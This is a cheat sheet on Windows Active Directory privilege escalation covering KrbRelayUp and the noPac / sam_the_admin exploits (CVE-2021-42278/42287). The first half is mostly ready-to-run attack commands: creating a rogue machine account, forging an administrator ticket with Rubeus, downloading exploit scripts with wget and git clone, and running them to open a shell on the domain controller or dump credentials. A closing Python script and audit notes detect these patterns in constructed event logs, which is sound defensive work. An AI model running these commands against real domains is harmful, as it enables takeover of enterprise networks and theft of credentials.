Active Directory Privilege Escalation
KrbRelayUp
Universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting). It also needs either the right to add a machine account (ms-DS-MachineAccountQuota greater than 0, default 10) or the password of an existing computer account; enforcing LDAP signing and channel binding, or setting the quota to 0, blocks the relay path.
https://github.com/Dec0ne/KrbRelayUp
Add a new machine account (uses the MachineAccountQuota):
Sharpmad.exe MAQ -Action new -MachineAccount evilcomputer -MachinePassword pass.123
Resolve the SID of the new machine account (PowerShell; the relay step that writes msDS-AllowedToActOnBehalfOfOtherIdentity on the local computer object needs this SID and is not shown here):
$o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
Find a free port for the relay listener:
CheckPort.exe
S4U2self/S4U2proxy as the machine account (/rc4 is the NT hash of its password) to get a ticket for administrator to the local host and inject it into the current session:
Rubeus.exe s4u /user:evilcomputer$ /rc4:DBA335196E8CE3DEDB7140452ADEE42D /impersonateuser:administrator /msdsspn:host/desktop12 /ptt
**Exploited: SamAccountName spoofing** (CVE-2021-42278 / CVE-2021-42287)
wget https://raw.githubusercontent.com/WazeHell/sam-the-admin/main/sam_the_admin.py; chmod +x sam_the_admin.py
Run with the credentials of any low-privileged domain user; -shell opens a shell on the DC as the impersonated user, -dump runs a secretsdump-style credential dump instead:
python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell
python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -dump
CVE-2021-42278
Confirm the low-privileged domain user you will authenticate as:
net user sakshi
git clone https://github.com/Ridter/noPac; cd noPac; chmod +x noPac.py;
--impersonate picks the account whose ticket is requested; -use-ldap creates and renames the machine account over LDAP instead of SAMR:
python3 noPac.py ignite.local/sakshi:'Password@1' -dc-ip 192.168.1.182 -shell --impersonate administrator -use-ldap
GetST only (without -shell or -dump, noPac just requests the impersonated user's service ticket and saves it to a .ccache file for later use):
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
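Both techniques above leave a distinctive trail in the domain controller's Security log: a machine account created by an ordinary user (4741), followed either by a write to msDS-AllowedToActOnBehalfOfOtherIdentity on a different computer object (5136, the KrbRelayUp pattern) or by a computer rename whose new sAMAccountName drops the trailing `$` (4742, the noPac pattern). The script below is an added example, not code from this page or from the KrbRelayUp / noPac projects; it runs that detection logic over a handful of constructed events. The dictionaries, their field names and the `TargetUserName` / `SamAccountName` semantics are simplified assumptions modelled on those three event IDs, not real log captures, and `DC1`, `DESKTOP12`, `WIN-K3QH7` and the user names are made up.

```python
"""Detect sAMAccountName spoofing (noPac) and RBCD writes (KrbRelayUp) in
Windows Security events. Added example; the events are constructed by hand."""

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed sample stream (assumption: one dict per event, flattened XML fields).
# alice.cassie: adds a machine account, then writes RBCD on DESKTOP12 (KrbRelayUp).
# sakshi: adds a machine account, renames it to "DC1", then renames it back (noPac).
# svc_deploy: a benign computer rename that keeps the trailing '$', plus an
# unrelated 4742 where the SAM Account Name attribute is reported as "-" (unchanged).
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "alice.cassie", "TargetUserName": "evilcomputer$"},
    {"EventID": 5136, "SubjectUserName": "alice.cassie", "ObjectClass": "computer",
     "ObjectDN": "CN=DESKTOP12,CN=Computers,DC=ecorp,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},  # %%14674 = value added
    {"EventID": 4741, "SubjectUserName": "sakshi", "TargetUserName": "WIN-K3QH7$"},
    {"EventID": 4742, "SubjectUserName": "sakshi", "TargetUserName": "WIN-K3QH7$", "SamAccountName": "DC1"},
    {"EventID": 4742, "SubjectUserName": "sakshi", "TargetUserName": "DC1", "SamAccountName": "WIN-K3QH7$"},
    {"EventID": 4742, "SubjectUserName": "svc_deploy", "TargetUserName": "LAPTOP7$", "SamAccountName": "LAPTOP07$"},
    {"EventID": 4742, "SubjectUserName": "svc_deploy", "TargetUserName": "LAPTOP07$", "SamAccountName": "-"},
]


def detect_samaccountname_spoofing(events, dc_names):
    """Flag 4742 events whose new sAMAccountName has no trailing '$'.

    A computer account that is renamed to a bare name is the core of
    CVE-2021-42278; if the bare name equals a DC's name the KDC will later
    resolve the forged TGT to that DC (CVE-2021-42287).
    """
    dcs = {name.rstrip("$").upper() for name in dc_names}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4742:
            continue
        new_name = ev.get("SamAccountName", "-")
        if new_name in ("-", "") or new_name.endswith("$"):
            continue  # attribute not changed, or still a normal machine account name
        findings.append({
            "technique": "sAMAccountName spoofing (CVE-2021-42278)",
            "subject": ev["SubjectUserName"],
            "account": ev["TargetUserName"],
            "new_name": new_name,
            "matches_dc": new_name.upper() in dcs,
        })
    return findings


def detect_rbcd_write_by_account_creator(events):
    """Flag 5136 writes to msDS-AllowedToActOnBehalfOfOtherIdentity on computer
    objects, and note whether the writer created a machine account earlier in
    the stream (the KrbRelayUp sequence: add account, relay, write RBCD)."""
    creators = set()
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4741:
            creators.add(ev["SubjectUserName"].lower())
        elif (eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR
              and ev.get("ObjectClass") == "computer"):
            subject = ev["SubjectUserName"]
            findings.append({
                "technique": "RBCD write on computer object (KrbRelayUp pattern)",
                "subject": subject,
                "target": ev["ObjectDN"],
                "created_machine_account_earlier": subject.lower() in creators,
            })
    return findings


def analyze(events, dc_names):
    """Run both detections and return all findings."""
    return (detect_samaccountname_spoofing(events, dc_names)
            + detect_rbcd_write_by_account_creator(events))


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS, ["DC1$"]):
        print(finding)
```

On a real DC the 4741/4742 events require the "Audit Computer Account Management" subcategory, and 5136 requires "Audit Directory Service Changes" together with a SACL on the computer objects that audits Write Property; without those the rename and the RBCD write are invisible and only the later 4768/4769 ticket requests remain.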